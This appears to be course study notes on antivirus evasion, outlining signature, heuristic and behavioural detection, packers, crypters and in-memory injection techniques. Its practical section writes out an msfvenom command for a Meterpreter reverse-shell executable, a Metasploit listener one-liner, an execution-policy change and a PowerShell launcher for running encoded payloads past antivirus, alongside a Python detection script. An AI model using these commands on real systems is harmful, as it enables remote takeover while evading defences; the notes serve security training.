0Sec

Module 17 (Antivirus Evasion)

Methods of Detecting Malicious Code

  • Signature-Based Detection

  • Heuristic-Based Detection

  • Behavioral-Based Detection

Bypassing Antivirus

  • On-Disk Evasion

    • Packers

    • Obfuscators

    • Crypters

    • Software Protectors

  • In-Memory Evasion

    • Remote Process Memory Injection

    • Reflective DLL Injection

    • Process Hollowing

    • Inline Hooking

Methods of Detecting Malicious Code

Signature-Based Detection

  • Identifies known malware based on predefined signatures.

Heuristic-Based Detection

  • Applies rules of thumb (heuristics) to the code's structure and behavior patterns to flag likely threats that have no exact signature match.

Behavioral-Based Detection

  • Examines the behavior of code during execution to identify suspicious activities.

On-Disk Evasion

Packers

  • Tools that compress or encrypt executable files to obfuscate their content.

Obfuscators

  • Techniques that obscure the code's logic and structure to make it harder to analyze.

Crypters

  • Tools that encrypt executable files to evade signature-based detection.

Software Protectors

  • Programs that protect executable files from analysis and tampering.

In-Memory Evasion

Remote Process Memory Injection

  • Injecting code into the memory space of a remote process.

Reflective DLL Injection

  • Loading a DLL into a process's memory without putting it on disk.

Process Hollowing

  • Creating a new suspended process and replacing its memory space with malicious code.

Inline Hooking

  • Modifying function pointers to redirect execution flow.

Practical

Manual

Avira Free Antivirus v15.0.34.16

Simple reverse shell binary

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f exe > binary.exe

Power shell ExecutionPolicy

powershell Get-ExecutionPolicy -Scope CurrentUser 
powershell Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser
powershell Get-ExecutionPolicy -Scope CurrentUser

metasploit one line command

msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LPORT 4444; set LHOST 192.168.1.6"

Powershell AV bypass payload

# The script to run (placeholder here); it is re-encoded below as UTF-16LE base64,
# the encoding powershell.exe expects after -e / -EncodedCommand.
$jHs = '<BASE64_ENCODED_PAYLOAD>'
$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($jHs))
$TmU = "-e "
# On a 64-bit host, launch the 32-bit PowerShell from SysWOW64 so the 32-bit stager runs.
if([IntPtr]::Size -eq 8){
    $YZfX = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell"
    iex "& $YZfX $TmU $e"
} else {
    iex "& powershell $TmU $e"
}
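The detection methods described above and the -e launcher just shown, tied together as an added example that is not from this page or from the course material: a small Python triage script (constructed function names, a constructed sample command line, no real payload) that applies literal signatures and weighted heuristics to a PowerShell command line, decodes the UTF-16LE base64 that ToBase64String(Unicode.GetBytes(...)) produces, and shows why a signature engine that never decodes the blob misses the launcher while a heuristic on the encoded-command flag still flags it.

```python
import base64
import re

# Exact strings lifted from the launcher on this page; a signature engine matches
# them only where they appear in clear text.
SIGNATURES = ["[IntPtr]::Size -eq 8", "syswow64\\WindowsPowerShell\\v1.0\\powershell"]
# Weighted heuristics: traits of a stager, none conclusive on its own.
HEURISTICS = {
    r"\s-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{40,}": 3,  # long -EncodedCommand blob
    r"\biex\b|Invoke-Expression": 3,                      # runtime evaluation of a string
    r"\[IntPtr\]::Size": 2,                               # bitness check before spawning
    r"syswow64": 2,                                       # forcing a 32-bit host process
    r"(To|From)Base64String": 2,                          # encoding/decoding at runtime
}
ENC_FLAG = re.compile(r"^-e(nc(odedcommand)?)?$", re.IGNORECASE)

def decode_encoded_command(cmdline):
    """Undo 'powershell -e <base64(UTF-16LE script)>', the encoding the launcher builds
    with [Text.Encoding]::Unicode + ToBase64String; None if no valid -e argument."""
    args = cmdline.split()
    for flag, blob in zip(args, args[1:]):
        if ENC_FLAG.match(flag):
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None

def scan_text(text):
    """Signatures plus weighted heuristics over one piece of text (raw or decoded)."""
    hits = [s for s in SIGNATURES if s in text]
    score = sum(w for pat, w in HEURISTICS.items() if re.search(pat, text, re.IGNORECASE))
    verdict = "malicious" if hits else "suspicious" if score >= 3 else "clean"
    return {"signature_hits": hits, "score": score, "verdict": verdict}

def analyze(cmdline):
    """Heuristics on the raw command line, then signatures on the decoded script."""
    raw = scan_text(cmdline)
    script = decode_encoded_command(cmdline)
    decoded = scan_text(script) if script is not None else None
    return {"raw": raw, "decoded": decoded}

# Constructed sample: a stand-in for the launcher body (placeholder, no payload),
# encoded exactly the way the launcher encodes $jHs before passing it to "-e".
INNER_SCRIPT = (
    '$p = "<PAYLOAD_PLACEHOLDER>"\n'
    'if([IntPtr]::Size -eq 8){ iex "& $env:SystemRoot\\syswow64\\WindowsPowerShell\\v1.0\\powershell -e $p" }'
)
SAMPLE_CMDLINE = "powershell -e " + base64.b64encode(INNER_SCRIPT.encode("utf-16-le")).decode("ascii")
BENIGN_CMDLINE = "powershell Get-ExecutionPolicy -Scope CurrentUser"
```

Run analyze() over both constructed command lines: the raw encoded launcher has no signature hits and is only "suspicious" on the encoded-command heuristic, while the decoded script exposes both literal signatures and is "malicious"; the benign Get-ExecutionPolicy line is "clean" with nothing to decode.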

Tools

  • Shellter

  • TheFatRat

  • Empire

  • Veil


Last updated 10 months ago
